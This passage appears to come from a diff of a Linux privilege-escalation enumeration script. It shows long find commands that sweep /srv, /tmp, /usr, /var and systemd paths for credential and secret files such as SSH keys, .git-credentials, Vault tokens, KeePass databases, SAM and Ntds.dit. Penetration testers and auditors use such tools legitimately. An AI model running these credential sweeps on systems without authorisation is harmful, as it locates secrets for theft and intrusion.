\"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"rocketchat.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"agent*\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \"ssh*config\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"rocketchat.service\" -o -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"sess_*\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name 